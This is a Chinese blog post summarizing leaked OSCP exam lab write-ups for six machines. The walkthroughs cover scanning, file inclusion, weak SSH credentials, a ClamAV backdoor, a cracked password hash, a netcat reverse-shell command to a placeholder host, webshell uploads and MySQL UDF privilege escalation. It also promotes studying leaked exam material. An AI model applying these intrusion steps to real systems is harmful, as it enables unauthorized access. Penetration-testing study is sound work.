OSCP真题泄露-目前已经移除
OSCP真题泄露-目前已经移除
0x0010-关于:
这次考题的泄露是因为一位国外的大佬对近期OSCP考试中存在大量的替考和作弊者很不高兴,加之OSCP的考题很久很有变化,因此这位大佬很生气,就在他的推特和个人网站上陆续公开了一些考试writeups,offsec官方响应也很快,已经将泄露的机器移除了考试环境。但是,作为学习还是值得学习的,有助于摸清套路。
这位大佬的网站是:https://cyb3rsick.com/
泄露的真题在:https://cyb3rsick.com/category/oscp-exam-writups/?order=asc
0x0020-老真题讲解:
0x0021-192.168.x.53 – offsecsmtp – OutOfBox
原贴传送门:https://cyb3rsick.com/2019/01/20/192-168-x-53-offsecsmtp-outofbox-machine-writeup/
第一步:信息收集
用nmap进行主机扫描
命令:nmap 192.168.x.53 -A
发现80端口,找到192.168.x.53/robots.txt文件泄露2个md5值(例如:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx),这里可不是让你解md5,这是出题者故意藏起来的目录。
第二步:渗透
发现文件包含漏洞,GET请求“ /xxxxxxxxxxxxxxxxxxxxxxxx/inc2.html?passwd”获得passwd文件:
获得可以用户名:OutOfBox
使用ssh连接主机,账号密码都是OutOfBox
第三步:提权
NSF可写,可以创建一个可以行文件,用setuid(0)获得root权限:
上传后运行获得root:
【套路总结】:
1、端口扫描中发现web服务必是重点;
2、有web先看robots.txt;
3、passwd中的可以用户名肯定有问题(弱口令很有可能);
4、提权方法之一:setuid(0)
0x0022-192.168.x.161 – Ph33r machine
原贴传送门:https://cyb3rsick.com/2019/01/20/192-168-x-161-ph33r-machine-writeup/
第一步:信息收集
老规矩nmap扫描端口:nmap -A 192.168.x.161
没有有价值发现,使用onesixtyone扫描,发现clam av运行在主机上,这个软件存在已知的后门利用
https://www.exploit-db.com/exploits/9913/
第二步:渗透
使用上面的exp打之,就可以获得在31337端口获得一个绑定shell,nc连上去就是root权限
【套路总结】:
1、第一步都是nmap扫描;
2、nmap未发现问题时,试试snmp扫描,可能有奇效;
3、注意一些冷门软件的漏洞,可以在exploit-db上搜索。
0x0023-192.168.x.55 – Admin-pc machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-55-admin-pc-machine-writeup/
第一步:信息收集
nmap:nmap 192.168.x.55 -A
结果如下:
发现ftp匿名访问。
第二步:渗透
ftp连上去获得xampp的配置文件:
获得用户认证信息如下:
fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1
破解可得明文如下:
fm:x-files
进入后台:192.168.x.55:10433/admin可以进行文件管理进而执行命令。
上传nc并且上传php文件开执行命令“nc –vv YOUR_HOST 443 –e cmd.exe”获得反弹shell
第三步:提权
上传jsp的webshell到“c:/xampp/tomcat/webapps/examples”目录,浏览器访问192.168.x.55:10433/examples/cmd.jsp?cmd=whoami,即可获得管理员权限。
【套路总结】:
1、ftp匿名访问,尤其是可写权限的一定要注意;
2、xampp是重要考点之一,配置文件之类的要注意;
3、高端口肯定可疑,不是后台就是某些软件的漏洞;
4、提权可以多试试不同脚本,很有可能不同脚本的执行权限不一样,如php是低权限、jsp也许就是高权限。
0x0024-192.168.x.53 – unreal tournament machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-53-unreal-tournament-machine-writeup/
第一步:信息收集
端口扫描:
tcp端口未发现有价值的可以试试udp端口
发现udp开启7778端口,是一个IRC服务,使用IRC客户端登录,发现提示信息中有unreal tournament。
第二步:渗透
exploit-db搜索unreal tournament,发现漏洞exp:https://www.exploit-db.com/exploits/16145
替换其中shellcode
使用msf打之,搞定。
【套路总结】:
1、注意udp的高端口;
2、冷门软件exp到exploit-db上找;
3、具备替换shellcode的能力是必考点。
0x0025-192.168.x.55 – UCAL Machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-55-ucal-machine-writeup/
第一步:信息收集
web扫描直接上“nikto -host 192.168.x.55”
发现:
第二步:渗透
exploit-db上找exp:
https://www.exploit-db.com/raw/18775/
打之,获得反弹shell
第三步:提权
使用Mempodipper提权:
https://www.exploit-db.com/raw/35161/
搞定
【套路总结】:
1、web扫描主要靠找到使用的哪套web程序,再到exploit-db上找exp;
2、提权看内核版本找exp打。
0x0026-192.168.x.67 – OFFENSIV-W2K3 machine
原贴传送门:https://cyb3rsick.com/2019/01/22/192-168-x-67-offensiv-w2k3-machine-writeup/
第一步:信息收集
http://192.168.x.67:8080/mail/checkspool.php存在远程命令执行,可获得反弹shell
第二步:渗透提权
读取配置文件 C:\Program Files\hMailServer\Bin\ hMailServer.INI
获得加密的root密码
使用C:\Program Files\hMailServer\Addons\Utilities\DecryptBlowfish.vbs脚本解密
修改配置文件,增加密码方法如下:https://www.hmailserver.com/forum/viewtopic.php?t=31096
上传lib_mysqludf_sys.dll到C:\xampplite\htdocs
再上传webshell文件adminer.php
执行命令调用dll
增加管理员账号,登录就是管理员。
【套路总结】:
1、web是低权限shell常见入口;
2、应用软件的配置文件是重点(账号密码);
3、mysql的udf提权需要注意。
更多资源关注知识星球“OSCP轻松过”
微信扫一扫
关注该公众号